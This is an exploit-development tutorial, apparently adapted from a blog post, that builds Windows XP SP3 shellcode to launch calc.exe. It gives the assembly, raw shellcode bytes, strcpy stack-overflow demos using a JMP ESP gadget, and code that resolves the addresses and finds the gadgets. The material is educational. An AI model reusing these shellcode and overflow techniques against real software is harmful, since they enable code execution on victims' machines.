Worked example: a payload that pops up the calculator (calc.exe). All addresses below are for Windows XP SP3 (32-bit, no ASLR); they are invalid on any other build.
.c
/* Plain-C reference for what the shellcode has to reproduce: launch
 * calc.exe through the CRT's system() and then terminate the process
 * with exit status 0. system() goes through the command interpreter,
 * which is fine for a demo but is not how a real program should spawn
 * a child (prefer CreateProcess/exec-style APIs with an explicit argv). */
(void)system("calc.exe");
exit(0);
.asm
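/* Hand-written 32-bit x86 inline assembly (MSVC syntax) that is later
 * dumped as raw bytes. It builds the strings "msvcrt.dll" and "calc.exe"
 * on the stack, then calls LoadLibraryA, system and exit through absolute
 * addresses. The encoded stub contains no NUL byte, so it survives a
 * strcpy()-style copy (see the overflow demos below).
 *
 * The three addresses are valid ONLY for Windows XP SP3 (no ASLR, so the
 * system DLLs load at the same base in every process). On any other build
 * they must be re-resolved, e.g. with the GetProcAddress lookup further down.
 *
 * Fix versus the original listing: the character constants used curly
 * quotes (‘l‘), which do not compile; they are plain ASCII quotes here. */
__asm {
    /* --- build "msvcrt.dll\0\0" (12 bytes) on the stack --- */
    xor  eax, eax
    push eax                    // four NUL bytes: string terminator
    mov  byte ptr [esp], 'l'
    mov  byte ptr [esp+1], 'l'  // "ll\0\0"
    push 'd.tr'                 // bytes "rt.d" (multi-char constant, little-endian)
    push 'cvsm'                 // bytes "msvc"
    mov  eax, esp
    push eax                    // arg: pointer to "msvcrt.dll"
    mov  eax, 7c801d7bh         // kernel32!LoadLibraryA (XP SP3)
    call eax                    // stdcall: callee removes the argument

    /* --- build "calc.exe\0\0\0\0" (12 bytes) on the stack --- */
    xor  eax, eax
    push eax
    push 'exe.'                 // bytes ".exe"
    push 'clac'                 // bytes "calc"
    mov  eax, esp
    push eax                    // arg: pointer to "calc.exe"
    mov  eax, 77BF93C7h         // msvcrt!system (XP SP3)
    call eax                    // cdecl: the argument is left on the stack;
                                // harmless because exit() below never returns

    /* --- exit(0) --- */
    xor  eax, eax
    push eax                    // arg: 0
    mov  eax, 77C09E7Eh         // msvcrt!exit (XP SP3)
    call eax
}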
ShellCode
/* The assembly stub above as raw machine code (65 bytes + the implicit
 * NUL terminator added by the string literal). The opcode bytes themselves
 * contain no 0x00, which is what lets the overflow demos copy the stub with
 * strcpy(). The embedded little-endian addresses (7C801D7B, 77BF93C7,
 * 77C09E7E) are the XP SP3 values from the assembly listing. */
unsigned char uc[] =
    "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
    "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
    "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
    "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF"
    "\xD0";

/* Treat the byte array as a function and jump into it. The call never
 * returns because the stub ends in exit(0).
 * NOTE(review): this executes code out of a writable data array; it only
 * works where DEP/NX is not enforced for this process (XP's default is
 * opt-in for system binaries only). Elsewhere, copy the bytes into memory
 * obtained with VirtualAlloc(..., PAGE_EXECUTE_READWRITE) first. */
typedef void (*FUNC)();
FUNC entry = (FUNC)uc;
entry();
Stack Overflow 1
void func1(char* s) { char buf[10]; strcpy(buf, s); } char ch[] = "0123456789123456";//integer multiple(4) DWORD* pEIP = (DWORD*)&ch[12];//retn address, +12 realease,+16 debug *pEIP = (DWORD)uc;//retn address point to ShellCode func1(ch);
ShellCode Overflow 2
/* Make sure user32.dll is mapped so the JMP ESP gadget at 77D29353 exists
 * in this process. The handle is intentionally never released: the module
 * has to stay loaded while the payload runs. */
HMODULE hMod = LoadLibrary("user32.dll");

/* Self-contained overflow payload, laid out as the stack will see it:
 *   16 bytes of filler  - fills buf and the padding up to the saved EIP
 *                         (16-byte offset, i.e. the debug-build layout)
 *   "\x53\x93\xD2\x77"  - new return address 0x77D29353 = JMP ESP in
 *                         user32.dll (XP SP3); after RET, ESP points at
 *                         the bytes that follow, so the jump lands there
 *   the calc shellcode  - identical to uc[] above; NUL-free, so strcpy()
 *                         copies every byte */
unsigned char uc[] =
    "1234567890123456\x53\x93\xD2\x77\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
    "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
    "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
    "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF"
    "\xD0";

/* Feed the payload to the vulnerable function; control never comes back. */
char* payload = (char*)uc;
func1(payload);
Obtaining the relevant addresses on Windows XP SP3
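/* Resolve the absolute addresses hard-coded in the shellcode. They are
 * only meaningful on Windows XP SP3: that OS has no ASLR, so a DLL maps at
 * the same base in every process. On Vista and later the bases change at
 * every boot and these numbers must be re-derived at run time.
 *
 * Changes versus the original listing:
 *  - the two handles had the same name (hMod) in one scope, which is a
 *    redefinition error; they are now hCrt and hUser;
 *  - the gadget scan is bounded by the module's SizeOfImage from its PE
 *    header instead of running until an access violation is caught with
 *    catch(...) - that only works under /EHa and a fault is not a
 *    legitimate loop terminator. */
HMODULE hCrt = LoadLibrary("msvcrt.dll");
if (hCrt) {
    printf("%p\r\n", GetProcAddress(hCrt, "system")); // 77BF93C7 on XP SP3
    printf("%p\r\n", GetProcAddress(hCrt, "exit"));   // 77C09E7E on XP SP3
    FreeLibrary(hCrt);
}

/* Find a "JMP ESP" (FF E4) gadget in user32.dll for the return-into-stack
 * overflow. Other two-byte gadgets with the same shape, for reference:
 *   FF E0..FF E7  JMP  EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI
 *   FF D0..FF D7  CALL EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI
 * NOTE(review): the first match is taken wherever it lies; on a system
 * with DEP the gadget must sit in an executable section, so check the
 * section protection before relying on it. */
HMODULE hUser = LoadLibrary("user32.dll");
if (hUser) {
    PBYTE pBase = (PBYTE)hUser;
    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
    if (pDos->e_magic == IMAGE_DOS_SIGNATURE) {
        PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
        if (pNt->Signature == IMAGE_NT_SIGNATURE) {
            DWORD cbImage = pNt->OptionalHeader.SizeOfImage;
            /* i + 1 < cbImage keeps the two-byte read inside the image */
            for (DWORD i = 0; i + 1 < cbImage; i++) {
                if (pBase[i] == 0xFF && pBase[i + 1] == 0xE4) {
                    printf("%p\r\n", pBase + i); // 77D29353 on XP SP3
                    break;
                }
            }
        }
    }
    FreeLibrary(hUser);
}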
Original article: http://www.cnblogs.com/nonebutnow/p/6006182.html